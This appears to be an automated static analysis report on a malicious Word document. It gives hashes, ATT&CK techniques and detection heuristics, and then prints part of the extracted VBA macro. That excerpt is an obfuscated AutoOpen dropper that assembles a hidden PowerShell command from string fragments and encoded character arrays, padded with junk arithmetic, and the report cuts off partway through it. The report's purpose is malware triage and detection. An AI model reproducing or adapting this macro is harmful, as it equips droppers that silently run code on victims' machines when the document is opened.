Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b0d67d68a8feb66…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 230.0 KB
Created: 2018-07-06 19:48:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 0ded1e121234d69958f96b0801801a0a
SHA-1: f0f2bd2bd29ecf27e4d14e3ec7b4e8017a1ee821
SHA-256: 4b0d67d68a8feb662b08bd902fe0123571db5cd7b7fc94644621dddc1ac809de
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing an obfuscated VBA macro with an AutoOpen subroutine. The macro calls `CreateObject` and `Shell()`, indicating an intent to execute arbitrary code, most likely to download and run a second-stage payload. The ClamAV detection (Doc.Dropper.Agent-6603019-0) corroborates its classification as a dropper.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6603019-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6603019-0
  • VBA macros detected (medium; 5 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12290 bytes
SHA-256: 3ee84dda51f690a8ccc24d83560d9894a2d7b9792b372c4911b762536990f8dc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HhzldHODWKFLT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   kAPDjd = XSDjm / WJAzK - (66355 * NjvkV - 86950 * XnnhrT + (APDuh + FqNHuw * pLQKOi * XDEihq))
   DznQG = MwpYp / VcQll - (30132 * PqZVw - 71708 * FDIBX + (LXzdaq + ZPtCYZ * QpDJX * Njdii))
   jDHnb = aIttIZ / McCkwC - (5468 * zONSO - 98715 * owLEYT + (QGcYrX + nmzHc * XhYsIw * iptVM))
   UviEBX = MwHaKi / KbNKlz - (51466 * aSvcL - 84284 * MHLGvC + (EvGENL + QSzRcX * fLbkB * UQIYM))
   uAIqoA = LzcnKv / hzwWz - (44363 * vQAwd - 2556 * iuVzjL + (YGCOXf + TNQzb * fjjHhU * zkIrK))
   iVoTpW = zDdjOX / opXGA - (23337 * cTNsC - 94436 * YMrMK + (ilFiw + RSGlv * AjQpJ * miLCCb))
   ETGoB = LKFjuY / Oiili - (37928 * nAPVKX - 64426 * DdUajO + (twdXSc + akOVUz * LBwio * DEkdiG))
   ZiZqmX = QkDks / huEVi - (35551 * BNvjDH - 48664 * ujjiEI + (itQzYI + zNERZF * HjUItl * nqniz))
wqrAfwuw (SjrTiqKDnDZ + qjpbuJlcmji + SJVEDDHI)
   OTsCTo = IKBLra / HpCjqs - (52766 * wrhro - 25618 * tMLpwV + (dSiQfs + ccqdad * cWaOBq * AVcAS))
   pjmCKA = ShlBLv / iYXkZ - (58847 * TrSncc - 70690 * mOPWo + (tGPqAT + WzdDrR * bcdAA * WrTPh))
   pzBbI = MjEZN / mUPqNN - (68106 * Rplbz - 59216 * czCPM + (UmdpBS + csRAB * EDliO * jwAAOa))
End Sub


Attribute VB_Name = "wuXloGqpS"
Function SjrTiqKDnDZ()
On Error Resume Next
VFUnhi = AwEnJX * busTYC - zwlwi / 35955 - (jpQSvL + uLKMR / (ZTXzW * FVKAt))
   XWHirw = wUHoV * LUjjh - GChfa / 76985 - (JMPWo + Cwown / (TOFBFM * cHNlob))
   Jvprju = oziwS * SSXVt - OsBBc / 36431 - (LRwbbv + jtAwH / (hBZGS * tRKpp))
jIAWzUIWd = "wershe" + "ll   " + "      " + "       " + "  & " + Chr(40) + " $eNv:" + "COMSPEC[4" + ",24,25]-" + "jOiN''" + Chr(41) + " "
EvIuN = pjAsX * DzjYR - NmZNS / 89907 - (UZaBcG + fbQol / (ljRwB * iKEvil))
   BItrc = MswPi * mLcbh - nLniUb / 23397 - (LXQdsP + pJXhY / (YuskC * duWic))
RWTsuKmzCs = Chr(40) + "[STrI" + "NG]::" + "JoIn" + Chr(40) + " ''" + " , " + Chr(40) + " " + "'114}56S" + "28z38" + "m107Q56" + "Q51m33G" + "123G57z" + "52~6" + "0G51" + "~53Q34"
MdXnRf = BocVXS * wCFtI - PRuuSL / 66351 - (opnPFQ + LmjQtU / (FQPfz * zUdiF))
FuNBL = "}118" + "z24}51G" + "34z120" + "-1z51%52" + "S21,58" + "~63~5" + "1G56-34-" + "109-114" + "~27S53"
rTjjIw = cWbht * PGGJLt - zDSjqj / 19696 - (jiYIs + dSqHcq / (JlNOFR * zPZOS))
   jcVGwA = woFRB * lPVdPP - LifnOX / 87066 - (LEKBh + cJNJwU / (HbJNw * MEHFpo))
   EwisZG = mjuPTc * FITTu - ECWZSm / 63105 - (EzVNr + XMfRX / (RUrOz * IDzzlW))
   iCaIZ = ZdikZB * NlsdBv - RjKHcp / 58058 - (QFOwUj + VmWrkn / (mHpvzv * GVjaM))
maLaCbY = "G52z" + "107z113-" + "62}34S3" + "4m38" + "-108}121" + "-121%33" + "m33z33-1" + "20m37" + "Q55z51-" + "61-55" + "-36z3" + "5m56m"
ijFNdG = lCUdM * OEHoDq - aZPDp / 59374 - (vPPsfn + UwYXMh / (PuMfYt * wHEmTS))
   BztZmC = rCYApm * QBjCBn - ESkRH / 21216 - (FJpfq + QqOCEZ / (tKpFc * KwXfQ))
   WzhIH = rZmtjV * wXanjw - WYtcfp / 83798 - (VidZS + RTIFvY / (rHRGjd * mYkzR))
   zEFcRn = DEQJCU * EShkZu - RcWwMa / 25907 - (wiHiqU + Dddlq / (DBwjJk * FCOspK))
ZVwthU = "63~55" + "}53%51~5" + "9Q51S" + "36%58" + "G55z56z" + "49G1" + "20G53S57"
kPopS = VPJCQ * usdiH - wtlkQ / 99425 - (OFikXD + wXpJl / (jbWCs * oIORh))
   BYwPK = nbzYB * HiQqIQ - iDYQl / 330 - (ILGMUm + jXzOS / (tHkhzs * qZnvKC))
   McHNON = bVlEP * bKQcpd - XTrRs / 6510 - (jXLBR + jTusAD / (ffOvu * NPOWSU))
   HtlpU = HiEJj * SCIQYc - EmrEvW / 30915 - (rVBtjs + ZZJCf / (SBbELI * KGzzp))
kYcoin = "%59%121," + "32-19,34," + "55z37,62" + "Q102S1" + "8z1%" + "121~22-62" + "m34S34"
tojzzo = Ewqfm * NFWDTw - lVXisr / 22168 - (AozLja + JnpKw / (fcfXG * aDrON))
   qYRAH = ddEKt * FYDvj - IAZGs / 82932 - (lTkYI + jkdjl / (niDSla * mEBAX))
vVSwAYiv = "~38Q108S" + "121S" + "121S33S3" + "3G33~120}" + "37m62" + "G57," + "38m1" + "23}33,"
Faikf = pWnsEv * JicoSE - fFhnfb / 8905 - (kTNQA + iJzzG / (zMPaj * jcVYLF))
jNpsizrB
... (truncated)